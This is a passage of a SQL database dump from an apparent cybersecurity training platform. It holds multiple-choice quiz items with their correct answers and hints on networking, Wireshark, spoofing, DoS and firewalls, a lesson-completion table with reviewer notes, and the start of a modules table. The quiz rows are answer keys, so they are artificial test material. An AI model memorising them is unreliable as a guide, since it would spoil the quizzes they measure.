(7228, 814, 'During the Post-Mortem meeting, the team discusses a failure: it took 12 hours to notice a critical alert. What is the most appropriate actionable change to implement?', 4, 'Tuning the SIEM to make critical alerts more visible and retraining the SOC analysts', 0, 'Fix the process that failed.', '2026-03-09 22:28:54', '[\"Buying a new brand of firewall\",\"Tuning the SIEM to make critical alerts more visible and retraining the SOC analysts\",\"Firing the IT Director\",\"Doing nothing\"]'),
(7229, 814, 'The output and action items from the \"Lessons Learned\" phase feed directly into which other phase of the PICERL methodology, creating a continuous improvement cycle?', 5, 'Preparation', 0, 'It feeds back to the beginning.', '2026-03-09 22:28:54', '[\"Identification\",\"Preparation\",\"Containment\",\"Eradication\"]'),
(7230, 815, 'How many layers are in the theoretical OSI model?', 1, '7', 0, 'It is a 7-layer model.', '2026-03-09 22:28:55', '[\"5\",\"4\",\"7\",\"9\"]'),
(7231, 815, 'Which OSI layer is responsible for logical IP addressing and routing packets between different networks?', 2, 'Layer 3: Network', 0, 'Routers live here.', '2026-03-09 22:28:55', '[\"Layer 2: Data Link\",\"Layer 3: Network\",\"Layer 7: Application\",\"Layer 4: Transport\"]'),
(7232, 815, 'TCP and UDP, along with port numbers, operate at which layer of the OSI model?', 3, 'Layer 4: Transport', 0, 'This layer handles end-to-end transport.', '2026-03-09 22:28:55', '[\"Layer 2\",\"Layer 3\",\"Layer 4: Transport\",\"Layer 5\"]'),
(7233, 815, 'The process of a higher-layer protocol adding its own header to the payload received from the layer above it, as data moves down the OSI stack, is called what?', 4, 'Encapsulation', 0, 'Putting the data inside a capsule (header).', '2026-03-09 22:28:55', '[\"Routing\",\"De-encapsulation\",\"Encapsulation\",\"Segmentation\"]'),
(7234, 815, 'In the simplified TCP/IP model, which single layer combines the functions of the OSI model\'s Session, Presentation, and Application layers?', 5, 'Application Layer', 0, 'The top layer of TCP/IP.', '2026-03-09 22:28:55', '[\"Transport Layer\",\"Network Access Layer\",\"Internet Layer\",\"Application Layer\"]'),
(7235, 816, 'Which transport layer protocol requires a \"3-Way Handshake\" to establish a connection before any actual data is transmitted?', 1, 'TCP', 0, 'Transmission Control Protocol.', '2026-03-09 22:28:55', '[\"TCP\",\"ICMP\",\"IP\",\"UDP\"]'),
(7236, 816, 'What are the three steps, in order, of the TCP 3-Way Handshake?', 2, 'SYN, SYN-ACK, ACK', 0, 'Synchronize, Synchronize-Acknowledge, Acknowledge.', '2026-03-09 22:28:55', '[\"ACK, SYN, SYN-ACK\",\"SYN, SYN-ACK, ACK\",\"SYN, ACK, FIN\",\"REQ, RES, ACK\"]'),
(7237, 816, 'Which protocol is connectionless, \"fire and forget\", and does not guarantee delivery of packets?', 3, 'UDP', 0, 'User Datagram Protocol.', '2026-03-09 22:28:55', '[\"SSH\",\"TCP\",\"UDP\",\"FTP\"]'),
(7238, 816, 'Which of the following applications would primarily rely on UDP for its communication?', 4, 'Live VoIP Phone Call', 0, 'Speed over reliability.', '2026-03-09 22:28:55', '[\"Downloading a ZIP file\",\"Sending an Email\",\"Live VoIP Phone Call\",\"Loading a Webpage\"]'),
(7239, 816, 'What is the term for the numerical identifier (ranging from 1 to 65535) used at Layer 4 to ensure incoming data is routed to the correct specific application running on a server?', 5, 'Port Number', 0, 'Like an apartment number in a building.', '2026-03-09 22:28:55', '[\"IP Address\",\"Port Number\",\"Socket\",\"MAC Address\"]'),
(7240, 817, 'Which protocol translates human-readable domain names like \"google.com\" into IP addresses?', 1, 'DNS', 0, 'Domain Name System.', '2026-03-09 22:28:55', '[\"DHCP\",\"HTTP\",\"ARP\",\"DNS\"]'),
(7241, 817, 'Which protocol is responsible for automatically distributing IP addresses and network configurations to laptops and phones connecting to a Wi-Fi network?', 2, 'DHCP', 0, 'Dynamic Host Configuration Protocol.', '2026-03-09 22:28:55', '[\"ICMP\",\"BGP\",\"DHCP\",\"DNS\"]'),
(7242, 817, 'If an attacker wants to perform a local Man-in-the-Middle attack by tricking a victim computer into believing the attacker\'s MAC address actually belongs to the Default Gateway, what protocol are they abusing?', 3, 'ARP', 0, 'Address Resolution Protocol.', '2026-03-09 22:28:55', '[\"ARP\",\"ICMP\",\"TCP\",\"DNS\"]'),
(7243, 817, 'The \"ping\" command line utility utilizes which Layer 3 diagnostic protocol to determine if a remote server is online?', 4, 'ICMP', 0, 'Internet Control Message Protocol.', '2026-03-09 22:28:55', '[\"TCP\",\"IGMP\",\"UDP\",\"ICMP\"]'),
(7244, 817, 'Why do modern malware developers primarily design their Command and Control (C2) communication to use HTTPS (TCP port 443)?', 5, 'To blend in with normal web traffic and bypass restrictive corporate firewalls', 0, 'It looks like regular encrypted browsing.', '2026-03-09 22:28:55', '[\"Because it is the fastest protocol available\",\"Because HTTPS traffic is not recorded by ISPs\",\"To blend in with normal web traffic and bypass restrictive corporate firewalls\",\"Because UDP is unreliable\"]'),
(7245, 818, 'In the Wireshark GUI, which pane displays the raw hexadecimal and ASCII representation of the packet?', 1, 'Packet Bytes Pane (Bottom)', 0, 'The lowest pane shows the rawest data.', '2026-03-09 22:28:55', '[\"Filter Pane\",\"Packet Details Pane (Middle)\",\"Packet List Pane (Top)\",\"Packet Bytes Pane (Bottom)\"]'),
(7246, 818, 'Which Wireshark pane allows you to expand protocol headers layer by layer (e.g., expanding the IPv4 header to see the TTL value)?', 2, 'Packet Details Pane (Middle)', 0, 'It breaks down the details of the protocol.', '2026-03-09 22:28:55', '[\"Packet Details Pane (Middle)\",\"Packet List Pane (Top)\",\"Packet Bytes Pane (Bottom)\",\"Status Bar\"]'),
(7247, 818, 'By default, what does the \"Time\" column in the Packet List pane display?', 3, 'Seconds since the beginning of the capture', 0, 'It is relative time by default.', '2026-03-09 22:28:55', '[\"Seconds since the beginning of the capture\",\"Remaining time until the capture ends\",\"The actual Time of Day (e.g., 14:00:00)\",\"Milliseconds since the computer booted\"]'),
(7248, 818, 'If you want to quickly organize the Packet List pane to show the largest packets at the top, what action should you take?', 4, 'Click on the \"Length\" column header to sort', 0, 'Sorting by columns.', '2026-03-09 22:28:55', '[\"Use the Find feature (Ctrl+F)\",\"Click on the \\\"Length\\\" column header to sort\",\"Write a complex display filter\",\"Change the Color Rules\"]'),
(7249, 818, 'In Wireshark\'s default color scheme, what do packets colored with black backgrounds and bright red text typically indicate?', 5, 'Errors, warnings, or bad checksums (like TCP Retransmissions)', 0, 'Red usually means bad news or errors.', '2026-03-09 22:28:55', '[\"Normal HTTP Web Traffic\",\"Encrypted SSH traffic\",\"Errors, warnings, or bad checksums (like TCP Retransmissions)\",\"Successfully established connections\"]'),
(7250, 819, 'What is the fundamental difference between a Capture Filter and a Display Filter in Wireshark?', 1, 'Capture filters determine what is saved to disk; Display filters hide/show data already saved', 0, 'One records, the other views.', '2026-03-09 22:28:55', '[\"Capture filters are applied after recording; Display filters are applied before\",\"Capture filters only work on Linux; Display filters only work on Windows\",\"Capture filters determine what is saved to disk; Display filters hide/show data already saved\",\"There is no difference, they are the same thing\"]'),
(7251, 819, 'Which display filter correctly shows traffic where the source IP address is exactly 10.0.0.100?', 2, 'ip.src == 10.0.0.100', 0, 'Remember the double equals and .src notation.', '2026-03-09 22:28:55', '[\"ip.addr = 10.0.0.100\",\"source_ip == 10.0.0.100\",\"ip_src := 10.0.0.100\",\"ip.src == 10.0.0.100\"]'),
(7252, 819, 'If an analyst wants to view all traffic for IP 192.168.1.5 that is NOT DNS traffic, which filter should they use?', 3, 'ip.addr == 192.168.1.5 && !(dns)', 0, 'Combine AND with NOT.', '2026-03-09 22:28:55', '[\"ip.addr = 192.168.1.5 AND NOT dns\",\"ip.addr == 192.168.1.5 && dns == 0\",\"ip.addr == 192.168.1.5 || !(dns)\",\"ip.addr == 192.168.1.5 && !(dns)\"]'),
(7253, 819, 'Which operator allows you to search for a specific, literal text string within the payload of a packet, such as `http _______ \"login\"`?', 4, 'contains', 0, 'It checks if the payload contains the string.', '2026-03-09 22:28:55', '[\"contains\",\"matches\",\"has\",\"includes\"]'),
(7254, 819, 'To show traffic targeting either the standard HTTP port OR the standard HTTPS port, which filter is correct?', 5, 'tcp.port == 80 || tcp.port == 443', 0, 'Use the boolean OR operator.', '2026-03-09 22:28:55', '[\"tcp.port == 80 && tcp.port == 443\",\"http || https\",\"tcp.port == 80 || tcp.port == 443\",\"tcp.ports = 80, 443\"]'),
(7255, 820, 'When you \"Follow TCP Stream\" in Wireshark, what does the software essentially do?', 1, 'Reassembles fragmented packets in order and strips away networking headers to show the raw application data', 0, 'It pieces the conversation back together.', '2026-03-09 22:28:55', '[\"Runs a malware scan on the packets\",\"Deletes all packets that are not part of the stream\",\"Decrypts all HTTPS traffic automatically\",\"Reassembles fragmented packets in order and strips away networking headers to show the raw application data\"]'),
(7256, 820, 'When viewing a followed TCP Stream window, what does the RED colored text signify?', 2, 'Data sent from the Client to the Server', 0, 'Red is client requests.', '2026-03-09 22:28:55', '[\"Data sent from the Server to the Client\",\"Data that failed a checksum\",\"Data that triggered an IDS alert\",\"Data sent from the Client to the Server\"]'),
(7257, 820, 'If you try to \"Follow TCP Stream\" on an SSH connection (Port 22), what will you see in the stream window?', 3, 'Random, unreadable gibberish characters', 0, 'SSH is fully encrypted.', '2026-03-09 22:28:55', '[\"The bash history of the user\",\"The username and password in plaintext\",\"A list of files on the server\",\"Random, unreadable gibberish characters\"]'),
(7258, 820, 'Which menu path allows you to quickly carve and rebuild a downloaded executable file out of an unencrypted web browsing session?', 4, 'File -> Export Objects -> HTTP', 0, 'Exporting HTTP objects.', '2026-03-09 22:28:55', '[\"File -> Export Objects -> HTTP\",\"Edit -> Find Packet -> Executable\",\"Statistics -> Protocol Hierarchy\",\"Analyze -> Decode As -> File\"]'),
(7259, 820, 'When exporting HTTP objects, what information does Wireshark use to try and determine what type of file it is (e.g., telling you it is `application/x-msdownload`)?', 5, 'The Content-Type HTTP header field', 0, 'The server tells the client what type of content it is.', '2026-03-09 22:28:55', '[\"The file extension in the URL\",\"The TCP Sequence Number\",\"The MAC address of the server\",\"The Content-Type HTTP header field\"]'),
(7260, 821, 'What fundamental flaw in the Address Resolution Protocol allows ARP spoofing to occur?', 1, 'Devices blindly accept and cache unsolicited ARP replies without any verification', 0, 'ARP is overly trusting.', '2026-03-09 22:28:55', '[\"ARP relies on UDP which does not guarantee delivery\",\"ARP broadcasts are dropped by modern network switches\",\"ARP packets are encrypted using a weak algorithm\",\"Devices blindly accept and cache unsolicited ARP replies without any verification\"]'),
(7261, 821, 'In an ARP spoofing attack, what specific hardware identifier is the attacker attempting to associate with a legitimate IP address?', 2, 'Their own MAC address', 0, 'Layer 2 is all about MAC addresses.', '2026-03-09 22:28:55', '[\"The default gateway\'s public IP address\",\"The switch\'s port number\",\"Their own MAC address\",\"A randomly generated IPv6 address\"]'),
(7262, 821, 'When an attacker successfully poisons the ARP cache of a victim and a router, putting themselves in the middle of the communication, what type of attack is this?', 3, 'Man-in-the-Middle (MITM)', 0, 'The attacker is literally standing in the middle.', '2026-03-09 22:28:55', '[\"Denial of Service (DoS)\",\"Cross-Site Scripting (XSS)\",\"Man-in-the-Middle (MITM)\",\"SQL Injection\"]'),
(7263, 821, 'Can an attacker on the public internet (e.g., in another country) perform an ARP spoofing attack against your home computer?', 4, 'No, ARP operates at Layer 2 and MAC broadcasts do not cross routers into the internet', 0, 'ARP is strictly local.', '2026-03-09 22:28:55', '[\"Yes, if they know your public IP address\",\"Yes, if they send enough ARP replies to overwhelm your router\",\"No, ARP operates at Layer 2 and MAC broadcasts do not cross routers into the internet\",\"No, because modern ISPs block all ARP traffic globally\"]'),
(7264, 821, 'If an attacker achieves a MITM position via ARP spoofing and decides to simply drop every packet the victim sends, effectively cutting off their internet access, what is this specific outcome called?', 5, 'A Blackhole or Denial of Service attack', 0, 'Traffic goes in but never comes out.', '2026-03-09 22:28:55', '[\"A Blackhole or Denial of Service attack\",\"A DNS Amplification attack\",\"A Smurf attack\",\"A Replay attack\"]'),
(7265, 822, 'In a local DNS Spoofing attack, what must the attacker typically accomplish first in order to intercept the victim\'s DNS queries?', 1, 'Establish a Man-in-the-Middle (MITM) position, usually via ARP Spoofing', 0, 'You need to be in the path of the traffic first.', '2026-03-09 22:28:55', '[\"Perform a Distributed Denial of Service (DDoS)\",\"Establish a Man-in-the-Middle (MITM) position, usually via ARP Spoofing\",\"Hack the corporate firewall\",\"Guess the victim\'s password\"]'),
(7266, 822, 'What is the primary goal of a malicious actor performing DNS Spoofing against a user navigating to their online bank?', 2, 'To redirect the user to a fake clone of the bank website to steal their login credentials', 0, 'Phishing via technical redirection.', '2026-03-09 22:28:55', '[\"To make the bank website load faster\",\"To redirect the user to a fake clone of the bank website to steal their login credentials\",\"To encrypt the user\'s hard drive for ransom\",\"To permanently delete the bank\'s DNS records\"]'),
(7267, 822, 'How does DNS Cache Poisoning differ from local DNS Spoofing?', 3, 'Cache poisoning targets the DNS Server itself, affecting all users of that server, rather than a single local victim', 0, 'Mass scale vs targeted scale.', '2026-03-09 22:28:55', '[\"Cache poisoning only works on IPv6 networks\",\"Cache poisoning targets the DNS Server itself, affecting all users of that server, rather than a single local victim\",\"Cache poisoning replaces the MAC address instead of the IP address\",\"There is no difference; they are synonymous terms\"]'),
(7268, 822, 'Which security technology provides cryptographic digital signatures to verify that the IP address in a DNS reply actually came from the true owner of the domain?', 4, 'DNSSEC', 0, 'DNS Security Extensions.', '2026-03-09 22:28:55', '[\"DNSSEC\",\"WPA3\",\"HTTPS\",\"VPN\"]'),
(7269, 822, 'What protocol encrypts DNS queries to prevent local attackers (like someone sniffing traffic at a coffee shop) from seeing or modifying which websites you are trying to visit?', 5, 'DoH (DNS over HTTPS)', 0, 'Hiding DNS inside encrypted web traffic.', '2026-03-09 22:28:55', '[\"DoH (DNS over HTTPS)\",\"FTP\",\"DHCP\",\"ICMP\"]'),
(7270, 823, 'In a TCP SYN Flood attack, which step of the 3-Way Handshake does the attacker intentionally fail to complete in order to consume server resources?', 1, 'The final ACK', 0, 'Leaving connections half-open.', '2026-03-09 22:28:55', '[\"The SYN-ACK response\",\"The final ACK\",\"The initial SYN\",\"The FIN packet\"]'),
(7271, 823, 'What is the primary characteristic of an \"Amplification\" or \"Reflection\" DoS attack?', 2, 'Sending a small spoofed request that results in a much larger response directed at the victim', 0, 'It acts as a force multiplier for the attacker.', '2026-03-09 22:28:55', '[\"Sending a small spoofed request that results in a much larger response directed at the victim\",\"Guessing the administrator\'s password millions of times per minute\",\"Encrypting the server\'s hard drive to prevent access\",\"Exploiting a buffer overflow in the web application code\"]'),
(7272, 823, 'Why do Amplification attacks almost exclusively rely on UDP protocols like DNS or NTP, rather than TCP?', 3, 'UDP is connectionless and stateless, making it easy to spoof the source IP address', 0, 'TCP\'s handshake prevents spoofed source IPs from establishing connections.', '2026-03-09 22:28:55', '[\"UDP packets are naturally larger than TCP packets\",\"TCP is immune to all forms of Denial of Service\",\"UDP is heavily encrypted making it harder to track\",\"UDP is connectionless and stateless, making it easy to spoof the source IP address\"]'),
(7273, 823, 'In a historic \"Smurf Attack\", what protocol does the attacker abuse by sending packets to a broadcast address with a spoofed source IP?', 4, 'ICMP (Ping)', 0, 'It uses Echo Requests and Replies.', '2026-03-09 22:28:55', '[\"DHCP\",\"HTTP\",\"SMTP\",\"ICMP (Ping)\"]'),
(7274, 823, 'What distinguishes a DDoS attack from a standard DoS attack?', 5, 'DDoS utilizes multiple compromised systems (a botnet) to launch the attack simultaneously', 0, 'Distributed means coming from many places at once.', '2026-03-09 22:28:55', '[\"DDoS attacks steal data, whereas DoS attacks only disrupt service\",\"DDoS relies on physical destruction of servers\",\"DDoS only targets government networks\",\"DDoS utilizes multiple compromised systems (a botnet) to launch the attack simultaneously\"]'),
(7275, 824, 'Which type of firewall looks at every single packet individually and has no memory of the overall connection or \"session\"?', 1, 'Stateless Packet-Filtering Firewall', 0, 'It lacks state awareness.', '2026-03-09 22:28:55', '[\"Web Application Firewall (WAF)\",\"Next-Generation Firewall (NGFW)\",\"Stateful Inspection Firewall\",\"Stateless Packet-Filtering Firewall\"]'),
(7276, 824, 'If an internal employee initiates an outbound connection to a web server, what feature allows a modern firewall to automatically permit the returning inbound web traffic without requiring a specific inbound \"allow\" rule?', 2, 'Stateful Inspection', 0, 'Tracking the state of the connection.', '2026-03-09 22:28:55', '[\"Deep Packet Inspection\",\"SSL Decryption\",\"Stateful Inspection\",\"Stateless Filtering\"]'),
(7277, 824, 'Next-Generation Firewalls (NGFWs) operate up to which layer of the OSI model, allowing them to understand specific applications like \"Facebook\" or \"BitTorrent\" rather than just \"Port 443\"?', 3, 'Layer 7 (Application Layer)', 0, 'The highest layer for application awareness.', '2026-03-09 22:28:55', '[\"Layer 3 (Network Layer)\",\"Layer 4 (Transport Layer)\",\"Layer 7 (Application Layer)\",\"Layer 5 (Session Layer)\"]'),
(7278, 824, 'What is the fundamental security principle that dictates a firewall should block all traffic unless a specific rule has been created to explicitly allow it?', 4, 'Implicit Deny / Default Deny', 0, 'Assume everything is bad until proven good.', '2026-03-09 22:28:55', '[\"Implicit Allow\",\"Default Reject\",\"Least Privilege Routing\",\"Implicit Deny / Default Deny\"]'),
(7279, 824, 'When a firewall blocks traffic coming from the public internet, which action is generally preferred because it silently discards the packet without giving the attacker any feedback or confirmation that the IP address is active?', 5, 'Drop (or Deny)', 0, 'Silence is golden when dealing with scanners.', '2026-03-09 22:28:55', '[\"Reject\",\"Drop (or Deny)\",\"Proxy\",\"Forward\"]'),
(7280, 825, 'Which system operates passively by analyzing a copy of network traffic (out-of-band) and only generates alerts without blocking the traffic?', 1, 'IDS (Intrusion Detection System)', 0, 'It detects, but does not prevent.', '2026-03-09 22:28:55', '[\"WAF (Web Application Firewall)\",\"NGFW (Next-Generation Firewall)\",\"IPS (Intrusion Prevention System)\",\"IDS (Intrusion Detection System)\"]'),
(7281, 825, 'Because an Intrusion Prevention System (IPS) sits \"in-line\" with network traffic, what is the most significant operational risk if it is misconfigured?', 2, 'It might accidentally drop legitimate business traffic (a False Positive block)', 0, 'Active inline blocking carries the risk of business disruption.', '2026-03-09 22:28:55', '[\"It cannot detect encrypted traffic at all\",\"It will slow down the network by copying traffic to a span port\",\"It might accidentally drop legitimate business traffic (a False Positive block)\",\"It will automatically grant administrator rights to external IP addresses\"]'),
(7282, 825, 'If a brand new, never-before-seen exploit (a Zero-Day) is launched against a network, which detection method is completely blind to it because it relies on known technical indicators?', 3, 'Signature-Based Detection', 0, 'Signatures only work for known past threats.', '2026-03-09 22:28:55', '[\"Anomaly-Based Detection\",\"Signature-Based Detection\",\"Heuristic Detection\",\"Behavioral Analysis\"]'),
(7283, 825, 'Which detection method creates a statistical baseline of \"normal\" traffic and alerts when deviations occur, such as an unusual spike in outbound data transfer at 3 AM?', 4, 'Anomaly/Behavior-Based Detection', 0, 'It looks for weird behavior, not specific bad code.', '2026-03-09 22:28:55', '[\"Anomaly/Behavior-Based Detection\",\"Signature-Based Detection\",\"Stateful Inspection\",\"Packet Filtering\"]'),
(7284, 825, 'If an organization values \"never accidentally dropping a legitimate customer transaction\" over \"stopping 100% of attacks automatically\", which deployment model should they choose?', 5, 'Deploy an IDS on a span port', 0, 'IDS cannot affect live traffic routing.', '2026-03-09 22:28:55', '[\"Deploy an IDS on a span port\",\"Deploy an IPS in-line\",\"Disable all security controls\",\"Deploy a stateless firewall\"]');

-- --------------------------------------------------------

--
-- Table structure for table `mobile_lesson_completions`
--

--
-- One row per lesson completion recorded from the mobile client.
-- Only the column list is in this statement; keys and indexes are not declared
-- here (phpMyAdmin normally emits them in a later ALTER TABLE, not visible in this view).
--
CREATE TABLE `mobile_lesson_completions` (
  `id` int(11) NOT NULL,                       -- row id; no PRIMARY KEY / AUTO_INCREMENT in this statement
  `user_id` int(11) NOT NULL,                  -- presumably references users.id; no FK declared here
  `lesson_id` int(11) NOT NULL,                -- presumably references the mobile lesson table; no FK declared here
  `xp_earned` int(11) DEFAULT 0,               -- dumped rows hold 15 or 25; the rule choosing the value is not in this file
  `completed_at` timestamp NOT NULL DEFAULT current_timestamp()  -- dump session runs with time_zone "+00:00", so dumped values read as UTC
) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;
-- NOTE(review): engine and charset differ from `modules` (InnoDB, utf8mb4). MyISAM does not
-- enforce FOREIGN KEY constraints and is non-transactional, so an orphaned user_id or
-- lesson_id cannot be rejected at the storage layer. The dumped rows also repeat
-- (user_id, lesson_id) pairs (e.g. 34/471, 78/8, 177/1), so nothing in this DDL stops a
-- lesson being credited more than once; if xp_earned is summed per user, dedupe in the
-- writer or add UNIQUE (user_id, lesson_id) -- confirm with the application code first.

--
-- Dumping data for table `mobile_lesson_completions`
--

--
-- Dumped rows. ids 70, 77, 81 and 88 are absent (presumably deleted).
-- Several (user_id, lesson_id) pairs repeat: 34/471 at ids 1 and 5, 78/8 at ids
-- 22 and 42, 177/1 at ids 51, 74 and 110 -- so a completion is not unique per
-- user+lesson in this data. In every row here xp_earned is 15 when lesson_id <= 12
-- and 25 otherwise; looks like a per-lesson value, confirm against the writer.
--
INSERT INTO `mobile_lesson_completions` (`id`, `user_id`, `lesson_id`, `xp_earned`, `completed_at`) VALUES
(1, 34, 471, 25, '2026-01-12 03:27:48'),
(2, 34, 469, 25, '2026-01-12 03:27:55'),
(3, 34, 4, 15, '2026-01-12 13:16:39'),
(4, 76, 470, 25, '2026-01-13 00:47:15'),
(5, 34, 471, 25, '2026-01-13 02:18:10'),
(6, 34, 6, 15, '2026-01-13 02:18:16'),
(7, 34, 3, 15, '2026-01-13 02:18:18'),
(8, 34, 9, 15, '2026-01-13 02:18:21'),
(9, 34, 7, 15, '2026-01-13 02:18:24'),
(10, 80, 6, 15, '2026-01-15 23:43:36'),
(11, 80, 9, 15, '2026-01-15 23:43:39'),
(12, 80, 11, 15, '2026-01-15 23:43:42'),
(13, 80, 449, 25, '2026-01-15 23:43:45'),
(14, 80, 5, 15, '2026-01-15 23:43:48'),
(15, 79, 449, 25, '2026-01-16 04:04:19'),
(16, 79, 5, 15, '2026-01-16 04:05:25'),
(17, 79, 11, 15, '2026-01-16 04:05:50'),
(18, 79, 9, 15, '2026-01-16 04:06:01'),
(19, 79, 6, 15, '2026-01-16 04:06:07'),
(20, 79, 8, 15, '2026-01-24 12:38:58'),
(21, 102, 8, 15, '2026-01-30 02:11:32'),
(22, 78, 8, 15, '2026-02-13 18:59:13'),
(23, 78, 450, 25, '2026-02-13 18:59:17'),
(24, 78, 472, 25, '2026-02-13 18:59:19'),
(25, 78, 468, 25, '2026-02-13 18:59:21'),
(26, 78, 10, 15, '2026-02-13 18:59:23'),
(27, 151, 6, 15, '2026-02-14 19:17:47'),
(28, 148, 447, 25, '2026-02-15 04:24:48'),
(29, 99, 12, 15, '2026-02-15 04:53:34'),
(30, 109, 1, 15, '2026-02-15 08:32:51'),
(31, 156, 469, 25, '2026-02-15 20:45:59'),
(32, 161, 6, 15, '2026-02-16 05:01:04'),
(33, 99, 7, 15, '2026-02-16 17:15:25'),
(34, 165, 12, 15, '2026-02-16 17:19:30'),
(35, 147, 447, 25, '2026-02-16 21:28:45'),
(36, 165, 7, 15, '2026-02-17 05:26:10'),
(37, 109, 12, 15, '2026-02-17 21:11:39'),
(38, 78, 1, 15, '2026-02-18 02:25:57'),
(39, 170, 1, 15, '2026-02-18 08:21:32'),
(40, 99, 451, 25, '2026-02-18 09:14:58'),
(41, 177, 451, 25, '2026-02-19 04:07:06'),
(42, 78, 8, 15, '2026-02-19 08:27:09'),
(43, 99, 472, 25, '2026-02-19 15:20:47'),
(44, 180, 472, 25, '2026-02-19 15:46:21'),
(45, 109, 471, 25, '2026-02-19 16:01:40'),
(46, 34, 12, 15, '2026-02-20 02:54:34'),
(47, 187, 1, 15, '2026-02-21 03:10:08'),
(48, 182, 7, 15, '2026-02-22 02:45:48'),
(49, 177, 472, 25, '2026-02-22 08:47:47'),
(50, 194, 12, 15, '2026-02-23 03:21:52'),
(51, 177, 1, 15, '2026-02-23 10:55:33'),
(52, 180, 469, 25, '2026-02-23 11:33:24'),
(53, 99, 10, 15, '2026-02-23 15:35:39'),
(54, 196, 3, 15, '2026-02-23 17:47:38'),
(55, 177, 7, 15, '2026-02-24 11:44:14'),
(56, 99, 470, 25, '2026-02-24 13:33:45'),
(57, 147, 469, 25, '2026-02-24 17:11:26'),
(58, 202, 8, 15, '2026-02-24 18:59:18'),
(59, 203, 471, 25, '2026-02-24 19:48:18'),
(60, 165, 449, 25, '2026-02-24 19:53:49'),
(61, 177, 449, 25, '2026-02-25 12:08:00'),
(62, 99, 1, 15, '2026-02-25 16:16:02'),
(63, 174, 1, 15, '2026-02-26 05:00:25'),
(64, 109, 448, 25, '2026-02-26 05:38:01'),
(65, 195, 3, 15, '2026-02-26 07:44:44'),
(66, 99, 11, 15, '2026-02-26 15:09:23'),
(67, 210, 1, 15, '2026-02-26 21:10:14'),
(68, 209, 1, 15, '2026-02-27 04:03:26'),
(69, 99, 12, 15, '2026-02-27 15:41:32'),
(71, 179, 1, 15, '2026-03-01 18:40:25'),
(72, 177, 469, 25, '2026-03-01 21:51:58'),
(73, 109, 469, 25, '2026-03-01 23:02:01'),
(74, 177, 1, 15, '2026-03-03 08:35:45'),
(75, 234, 447, 25, '2026-03-03 19:47:00'),
(76, 237, 470, 25, '2026-03-04 00:44:59'),
(78, 229, 451, 25, '2026-03-04 10:39:27'),
(79, 238, 11, 15, '2026-03-04 15:24:05'),
(80, 220, 7, 15, '2026-03-05 06:42:05'),
(82, 109, 472, 25, '2026-03-06 05:15:36'),
(83, 229, 449, 25, '2026-03-06 20:54:06'),
(84, 259, 5, 15, '2026-03-06 21:49:59'),
(85, 177, 10, 15, '2026-03-07 19:10:20'),
(86, 177, 8, 15, '2026-03-08 11:22:07'),
(87, 109, 12, 15, '2026-03-08 12:48:39'),
(89, 264, 11, 15, '2026-03-09 09:48:04'),
(90, 266, 6, 15, '2026-03-09 12:22:07'),
(91, 195, 449, 25, '2026-03-09 20:58:17'),
(92, 273, 6, 15, '2026-03-10 13:59:07'),
(93, 266, 1, 15, '2026-03-10 14:33:19'),
(94, 274, 3, 15, '2026-03-10 21:03:08'),
(95, 229, 1, 15, '2026-03-11 01:35:29'),
(96, 78, 470, 25, '2026-03-11 07:48:14'),
(97, 275, 3, 15, '2026-03-11 10:53:17'),
(98, 195, 7, 15, '2026-03-11 12:05:45'),
(99, 285, 8, 15, '2026-03-12 07:40:14'),
(100, 288, 469, 25, '2026-03-12 10:23:54'),
(101, 290, 1011, 25, '2026-03-12 14:11:40'),
(102, 293, 449, 25, '2026-03-13 11:14:37'),
(103, 288, 448, 25, '2026-03-13 12:22:26'),
(104, 180, 1027, 25, '2026-03-13 18:04:25'),
(105, 266, 3, 15, '2026-03-14 02:17:15'),
(106, 294, 1, 15, '2026-03-14 04:15:23'),
(107, 295, 1006, 25, '2026-03-14 06:28:16'),
(108, 99, 472, 25, '2026-03-14 07:28:02'),
(109, 299, 470, 25, '2026-03-14 21:43:38'),
(110, 177, 1, 15, '2026-03-15 04:30:01'),
(111, 78, 1027, 25, '2026-03-15 05:51:51'),
(112, 78, 12, 15, '2026-03-15 05:52:03'),
(113, 78, 5, 15, '2026-03-15 05:52:05'),
(114, 78, 451, 25, '2026-03-15 05:52:06'),
(115, 266, 449, 25, '2026-03-15 14:35:10'),
(116, 99, 468, 25, '2026-03-15 17:43:57');

-- --------------------------------------------------------

--
-- Table structure for table `modules`
--

--
-- Modules: the ordered units that make up a learning path.
-- Only the column list is in this statement; keys and indexes are not declared
-- here (phpMyAdmin normally emits them in a later ALTER TABLE, not visible in this view).
--
CREATE TABLE `modules` (
  `id` int(11) NOT NULL,                      -- row id; no PRIMARY KEY / AUTO_INCREMENT in this statement
  `learning_path_id` int(11) NOT NULL,        -- presumably references learning_paths.id; no FK declared here
  `title` varchar(255) NOT NULL,
  `description` text DEFAULT NULL,
  `estimated_hours` int(11) DEFAULT 0,
  `display_order` int(11) DEFAULT 0,          -- sort key within a path; the dumped path-2 rows all carry 0, so their relative order is undefined unless the reader sorts by another column
  `prerequisite_module_id` int(11) DEFAULT NULL,  -- presumably a self-reference to modules.id; NULL in every dumped row visible here
  `is_active` tinyint(1) DEFAULT 1,           -- 1/0 flag; every dumped row visible here is 1
  `created_at` timestamp NULL DEFAULT current_timestamp(),
  `updated_at` timestamp NULL DEFAULT current_timestamp() ON UPDATE current_timestamp()  -- server-maintained on every UPDATE
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `modules`
--

-- Seed rows for `modules`. Facts visible in the data itself:
--  * ids are non-contiguous (3, 5-8, 13, 35, 45-48, 50 and 54-116 are absent),
--    consistent with rows deleted after creation.
--  * display_order is 0 for every row of learning paths 2, 3 and 4, so that
--    column alone does not define their order within a path.
--  * estimated_hours is 0 for all rows of paths 9, 11 and 12.
--  * The double quotes in the row for id 22 are MySQL backslash-escaped
--    (\"Brain\"), not a broken literal.
INSERT INTO `modules` (`id`, `learning_path_id`, `title`, `description`, `estimated_hours`, `display_order`, `prerequisite_module_id`, `is_active`, `created_at`, `updated_at`) VALUES
(1, 1, 'Introduction to Cybersecurity', 'Learn what cybersecurity is, why it matters, and explore career paths in the field.', 15, 1, NULL, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07'),
(2, 1, 'Linux Fundamentals', 'Master the Linux command line, file permissions, and basic system administration.', 25, 2, NULL, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07'),
(4, 1, 'Networking Essentials', 'Learn the OSI model, TCP/IP, subnetting, and common network protocols.', 30, 4, NULL, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07'),
